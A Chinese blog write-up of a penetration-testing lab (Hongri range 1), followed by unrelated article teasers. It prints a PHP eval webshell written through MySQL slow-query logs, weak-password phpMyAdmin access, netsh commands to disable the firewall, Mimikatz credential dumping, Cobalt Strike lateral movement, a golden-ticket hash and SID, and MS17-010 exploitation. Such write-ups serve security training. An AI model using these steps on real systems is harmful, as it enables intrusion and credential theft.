红日靶场1学习笔记

一、准备工作

1、靶场搭建

靶场地址
靶场描述
在这里插入图片描述靶场拓扑图
在这里插入图片描述
其他相关靶场搭建详情见靶场地址相关说明

2、靶场相关主机信息

后续打靶场的过程中,如果不是短时间内完成,可能ip会有变化

主机ip密码角色
win7192.168.122.131hongrisec@2019!边界服务器
win7192.168.52.143hongrisec@2019!边界服务器
win2008192.168.52.138hongrisec@2019#域控
win2003192.168.52.141hongrisec@2019!域成员
kali192.168.122.128攻击机1
win11192.168.122.1攻击机2

3、环境配置启动

启动win7的phpstudy
在这里插入图片描述win 7能通域内其他主机和互联网
在这里插入图片描述
win2008 不能通互联网
在这里插入图片描述

二、web渗透

1、IP及端口的探测

goby、nmap都可以
在这里插入图片描述

2、访问相关端口,可以发现phpinfo页面

在这里插入图片描述

3、进一步进行目录爆破,发现phpmyadmin目录

其他相关文章还写到扫出来了备份文件,对后续文件上传拿到文件路径有帮助,但是我这边没有扫出来,和字典有关
在这里插入图片描述

在这里插入图片描述

4、通过弱口令登录phpmyadmin,弱口令root:root

在这里插入图片描述

5、先修改一下弱口令

如果是攻防赛中可以进行这一步,这里有点多余了
在这里插入图片描述

6、百度大法,发现可以通过数据库写入webshell

phpMyAdmin 渗透利用总结
法一:
直接往web目录下写入webshell
需要的条件:a、有权限写 b、知道web目录绝对路径
查看当前数据库用户是否有写的权限

show variables like '%secure%';

secure-file-priv特性:
secure-file-priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。
当secure_file_priv的值为null ,表示限制mysql 不允许导入|导出
当secure_file_priv的值为/tmp/ ,表示限制mysql 的导入|导出只能发生在/tmp/目录下
当secure_file_priv的值没有具体值时,表示不对mysql 的导入|导出做限制
可以在mysql-ini文件中设置其属性
在这里插入图片描述此处权限为默认NULL,不允许导入导出文件,另寻他法
补充:
如何设置这一属性?
在这里插入图片描述

法二:通过日志文件写入webshell
条件:日志读写权限+web目录的绝对路径
查看当前选项值

show global variables like '%long_query_time%'

在这里插入图片描述开启日志记录功能

set global general_log = "ON";

在这里插入图片描述查看当前日志文件

show variables like 'general%';

在这里插入图片描述
指定日志文件,相关路径phpinfo页面可以看到

set global general_log_file = " C:/phpStudy/WWW/zshell.php";

在这里插入图片描述无法设置日志文件,另寻他法

法三:

尝试通过慢日志写入webshell
慢日志:一般都是通过long_query_time选项来设置这个时间值,时间以秒为单位,可以精确到微秒。如果查询时间超过了这个时间值(默认为10秒),这个查询语句将被记录到慢查询日志中。

查询当前慢查询日志目录

show variables like '%slow%';

在这里插入图片描述

开启慢查询日志记录功能

set GLOBAL slow_query_log=on;

在这里插入图片描述指定慢查询日志文件
这里就可以成功,为啥上面不能成功?

set GLOBAL slow_query_log_file='C:/phpStudy/WWW/zshell.php';

在这里插入图片描述向慢查询日志中写入phpinfo页面

select "<?php phpinfo();?>" or sleep(11);

在这里插入图片描述查看该日志文件可以成功被解析
在这里插入图片描述进一步写入webshell

set GLOBAL slow_query_log_file='C:/phpStudy/WWW/shell.php';
select "<?php @eval($_POST['cmd']);?>" or sleep(11);

在这里插入图片描述

用蚁剑成功连接webshell
在这里插入图片描述在这里插入图片描述
至此,通过phpmyadmin获取到了web服务器的相关权限

http服务和数据库肯定是为网站服务的
发现数据库中存在newyxcms数据库,搜索相关信息,可以在网上发现源码和相关漏洞
在这里插入图片描述

7、访问相关web页面,进一步挖掘漏洞

前面修改了数据库的密码导致访问报错,又重新修改了密码

http://192.168.122.131/yxcms/
在这里插入图片描述通过公告信息,进入后台(默认弱口令)
在这里插入图片描述
在这里插入图片描述前台模板管理处新建模板文件写入webshell进行漏洞利用
在这里插入图片描述webshell 路径可以在公开源码中查看相关文件获取,也可以通过前面扫出来的网站源码获取,此处的版本和靶机cms的版本不同,但是文件路径一样,最好找相同版本的源码
在这里插入图片描述通过蚁剑连接webshell
![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/55655708ce4748e484611caef6416f8b.png)

留言板存在存储型xss,后台审核可触发
在这里插入图片描述其他文章中还提到了一个sql 注入漏洞,感兴趣的可以自行研究

三、后渗透

主要思路:通过cs生成木马上传到网站服务器进行下一步渗透,如域渗透和横向移动,权限提升和维持

1、通过蚁剑连接后,关闭防火墙

以防对后续测试造成影响,靶场有时候也很玄学

netsh advfirewall show allprofile state                   查看防火墙状态
netsh advfirewall set allprofiles state off 			   关闭防火墙

在这里插入图片描述

2、通过cs生成木马并用蚁剑上传到网站服务器上

在这里插入图片描述在cmd 中运行木马
在这里插入图片描述

3、主机上线后抓取用户名密码,进行内网存活主机端口扫描

抓取主机用户名密码,点击Run Mimikatz
在这里插入图片描述

在这里插入图片描述还可以直接进行提权在这里插入图片描述
在这里插入图片描述主机相关信息收集

net group /domain          域内用户列表net group "domain computers" /domain    域内计算机列表net group "domain admins" /domain       域内管理员列表hostname                                本机名称
net time /domain
查看时间,通过域控获取的时间,可以看到域控的主机名,ping一下可以获取域控的ipnet view
可以看到域里面的用户,ping 一下可以获取相关的ip

内网主机端口扫描
在这里插入图片描述发现存在另外两台主机:192.168.52.138、192.168.52.141
在这里插入图片描述查看域控,发现owa为域控

在这里插入图片描述

四、横向移动

1、搭建代理,进行端口转发

kali上开启frp 服务端
在这里插入图片描述将客户端通过蚁剑上传到win7上,但是一直无法启动
在这里插入图片描述看其他人可以成功,不知道什么问题,上传了这个dll文件也不行

2、通过SMB Beacon达到通内网的目的

网上说这是一个很隐蔽,可以绕过防火墙的好方法,咱也不懂,咱也不敢问
SMB Beacon 使用命名管道通过一个父 Beacon 进行通信。这种对等通信
对同一台主机上的 Beacon 和跨网络的 Beacon 都有效。Windows 将命名管道通信封装在 SMB 协议中。因此得名 SMB Beacon。
参考链接

创建一个新的SMB监听器

在这里插入图片描述
选择138的主机进行横向移动
在这里插入图片描述

138的主机成功上线,同样抓取密码,关闭防火墙
在这里插入图片描述在这里插入图片描述

3、权限维持(黄金票据)

把SID,域名,复制下来等下黄金票据要用

hash:58e91a5ac358d86513ab224312314061:::SID: S-1-5-20域名:GOD.ORG

通过黄金票据提权
原理链接
在这里插入图片描述回头再详细研究吧,先照猫画虎

右键->access->golden ticket

在这里插入图片描述

在这里插入图片描述基本上可以通过CS 一把梭了,怪不得说CS是神器

4、cs与msf 联动进行漏洞利用

其实不用cs直接用msf也可以达到目的,不过是各有各的优势,组合起来各取所长
kali端
在这里插入图片描述
cs端
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
获取msf反弹shell,设置代理隧道,使得msf能够通过win7路由转发访问192.168.25.0/24网段

shell     #相当于cmd
chcp 65001    #解决乱码
arp -a    #查看主机arp表信息

在这里插入图片描述
建隧道
在这里插入图片描述在这里插入图片描述在这里插入图片描述进一步利用ms17_010漏洞来探测攻击
在这里插入图片描述同样也发现141主机存在相同漏洞
在这里插入图片描述结束语:写到这里就结束了,一个靶场看起来不大,打起来还是有很多方法和注意的事项。比如说通内网的方法,有用frp的,还有用smb、写路由的,还有提权的各种方法,值得大家探索,毕竟多一种方法多一条路。靶场可以很快打完,但是写文章有时候也是比较麻烦的,不过这也算是一种修行。小小脚本小子,还需多多学习,写的不好的地方大家多多批评指正。还有七个靶场,继续加油!

每日名言:
别问兜里还有多少钱,就问你的青春还都多少年
苦难是生命的防沉迷系统
很多人看不到未来,其实是看到了未来
回忆不过是在时间的长河里刻舟求剑
我最新的照片,其实是我最老的照片

参考文章:
https://blog.csdn.net/qq_41821603/article/details/109948920
https://cloud.tencent.com/developer/article/1595245
https://blog.csdn.net/qq_52849046/article/details/139163010
https://blog.csdn.net/m0_66638011/article/details/139727914?spm=1001.2101.3001.6661.1&utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7Ebaidujs_baidulandingword%7ECtr-1-139727914-blog-136015522.235%5Ev43%5Epc_blog_bottom_relevance_base1&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7Ebaidujs_baidulandingword%7ECtr-1-139727914-blog-136015522.235%5Ev43%5Epc_blog_bottom_relevance_base1&utm_relevant_index=1

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/881312.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

CAN(Controller Area Network)总线的仲裁机制

CAN&#xff08;Controller Area Network&#xff09;总线的仲裁机制是其核心特性之一&#xff0c;它确保了在多节点环境中数据能够高效、公正地传输。以下是对CAN仲裁机制的详细解释和介绍&#xff1a; 一、仲裁机制概述 在CAN总线网络中&#xff0c;各个节点地位平等&#…

【分布式微服务云原生】gRPC与Dubbo:分布式服务通信框架的双雄对决

目录 引言gRPC&#xff1a;Google的高性能RPC框架gRPC通信流程图 Dubbo&#xff1a;阿里巴巴的微服务治理框架Dubbo服务治理流程图 表格&#xff1a;gRPC与Dubbo的比较结论呼吁行动Excel表格&#xff1a;gRPC与Dubbo特性总结 摘要 在构建分布式系统时&#xff0c;选择合适的服务…

HTML DOM 节点

HTML DOM 节点 介绍 HTML DOM(文档对象模型)是HTML文档的编程接口。它将HTML文档表示为节点树,其中每个节点都是文档的一部分。HTML DOM节点包括元素节点、属性节点、文本节点等。本文将详细介绍HTML DOM节点的概念、类型和操作方法。 HTML DOM节点类型 元素节点 元素节…

Linux学习笔记(七):磁盘的挂载与扩展

Linux学习笔记&#xff08;七&#xff09;&#xff1a;磁盘的挂载与扩展 在虚拟机环境中&#xff0c;当我们的存储空间不足时&#xff0c;添加一块新的硬盘显得尤为重要。 1. 新增磁盘 首先&#xff0c;你需要确保有一块物理磁盘或虚拟磁盘。在虚拟机管理器中&#xff0c;你可以…

微信小程序:一个小程序跳转至另一个小程序

一、微信小程序支持一个小程序跳转至另一个小程序吗&#xff1f; 支持。 1.1、目标小程序需开放被跳转&#xff1a;目标小程序需要在其 app.json 文件中配置 navigateToMiniProgramAppIdList&#xff0c;将源小程序的 AppID 加入其中。 1.2、用户授权&#xff1a;用户需要授…

SSL 协议(HTTPS 协议的关键)

所谓的协议 协议只是一种规则&#xff0c;你不按规则来就无法和目标方进行你的工作 协议说白了只是人定的规则&#xff0c;任何人都可以定协议 我们不需要太了解细节&#xff0c;这些是制定和完善协议的人去做的&#xff0c;我们只需要知道协议的一个大概 一、SSL 协议 1、…

PostgreSQL学习笔记二:PostgreSQL的系统架构

PostgreSQL 是一种功能强大的开源关系型数据库管理系统&#xff0c;其架构具有以下特点&#xff1a; 一、客户端/服务器架构 客户端 客户端可以是各种应用程序&#xff0c;如 Web 应用、桌面应用等&#xff0c;它们通过网络连接与 PostgreSQL 服务器进行通信。客户端使用标准的…

HTML图形

HTML图形 1. HTML5 Canvas2.HTML5 内联 SVG3.HTML 5 Canvas vs. SVG 1. HTML5 Canvas HTML5 的 canvas 元素使用 JavaScript 在网页上绘制图像。画布是一个矩形区域&#xff0c;您可以控制其每一像素。canvas 拥有多种绘制路径、矩形、圆形、字符以及添加图像的方法。 1、创建…

【pytorch】pytorch入门5:最大池化层(Pooling layers )

文章目录 前言一、定义概念 缩写二、参数三、最大池化操作四、使用步骤总结参考文献 前言 使用 B站小土堆课程 一、定义概念 缩写 池化&#xff08;Pooling&#xff09;是深度学习中常用的一种操作&#xff0c;用于降低卷积神经网络&#xff08;CNN&#xff09;或循环神经网…

constructor

java 构造函数 在Java中&#xff0c;构造函数是用于初始化对象的特殊方法。构造函数具有与类同名的方法&#xff0c;并且没有返回类型。以下是Java构造函数的一些关键点和示例&#xff1a; 特点&#xff1a; 名称与类名相同&#xff1a;构造函数的名称必须与类的名称完全一致…

微知-如何临时设置Linux系统时间?(date -s “2024-10-08 22:55:00“, time, hwclock, timedatectl)

背景 在tar解压包的时候经常出现时间不对&#xff0c;可以临时用date命令修改一下&#xff0c;也可以其他&#xff0c;本文主要介绍临时修改的方法 date命令修改 sudo date -s "2024-10-08 22:55:00"其他查看和修改的命令 本文只记录查看方式&#xff0c;修改的暂…

mysql 查出数据是乱序的

在 MySQL 中&#xff0c;如果你发现查询出来的数据是乱序的&#xff0c;这通常是因为没有指定 ORDER BY 子句。SQL 查询的结果集默认是不保证排序顺序的&#xff0c;除非明确指定了排序规则。 以下是一些解决方法和考虑事项&#xff1a; 1. 使用 ORDER BY 子句 在查询时&…

详解正确创建好SpringBoot项目后但是找不到Maven的问题

目录 问题 解决步骤&#xff1a; 找到File->Project Structure... 设置SDK 设置SDKs 问题 刚刚在使用IDEA专业版创建好SpringBoot项目后&#xff0c;发现上方导航栏的运行按钮是灰色的&#xff0c;而且左侧导航栏的pom.xml的图标颜色也不是正常的&#xff0c;与此同时我…

SpringBoot Jar 包加密防止反编译

今天看到了一个说明jar包加密的实现方式&#xff0c;特意试了下效果&#xff0c;并下载了插件源码及实现源码查看了下子&#xff0c;感兴趣的可以在最后得到gitee地址。 SpringBoot 程序 Jar 包加密的方式&#xff0c;通过代码加密可以实现无法反编译。应用场景就是当需要把公司…

【AI知识点】词袋模型(Bag-of-Words,BOW)

词袋模型&#xff08;Bag-of-Words&#xff0c;简称BOW&#xff09;是一种用于文本表示的简单且常用的方法&#xff0c;尤其在自然语言处理&#xff08;NLP&#xff09;和信息检索领域中广泛应用。词袋模型的核心思想是将文本表示为一个词频统计的集合&#xff0c;而不考虑词的…

Draw a triangle

Problem - E - Codeforces 题意:给定两个点的坐标求第三个点并且使得三个点围成的三角形面积最小&#xff1b; 这道题涉及了很多知识点&#xff1a; 1.在二维空间中&#xff0c;两个向量a,b叉乘&#xff0c;|a*b|在数值上等于以向量a和向量b为邻边构成的平行四边形的面积&am…

【Java】异常的处理-方式【主线学习笔记】

文章目录 前言1、处理概述2、Java异常处理机制&#xff08;方式&#xff09;方式一&#xff08;抓抛模型&#xff09;&#xff1a;try-catch-finally方式二&#xff1a;throws 异常类型总结 前言 Java是一门功能强大且广泛应用的编程语言&#xff0c;具有跨平台性和高效的执行…

螺蛳壳里做道场:老破机搭建的私人数据中心---Centos下Docker学习03(网络及IP规划)

3 网络及IP规划 3.1 容器连接网络初步规划 规划所有容器与虚拟机的三张网卡以macvlan的方式进行连接&#xff08;以后根据应用可以更改&#xff09;&#xff0c;在docker下创建nat、wifi、nei、wai四张网卡&#xff0c;他们和虚拟机及宿主机上NIC的相关连接参数如下表所示&am…

Linux防火墙-案例(二)snatdnat

作者介绍&#xff1a;简历上没有一个精通的运维工程师。希望大家多多关注作者&#xff0c;下面的思维导图也是预计更新的内容和当前进度(不定时更新)。 我们经过上小章节讲了Linux的部分进阶命令&#xff0c;我们接下来一章节来讲讲Linux防火墙。由于目前以云服务器为主&#x…

脑机接口技术的未来与现状:Neuralink、机械手臂与视觉假体的突破

近年来&#xff0c;脑机接口&#xff08;BCI&#xff09;技术发展迅速&#xff0c;不仅限于科幻小说和电影&#xff0c;已经逐步进入现实应用。特别是马斯克的Neuralink公司推出的“盲视&#xff08;Blindsight&#xff09;”设备&#xff0c;最近获得了FDA的突破性设备认定&am…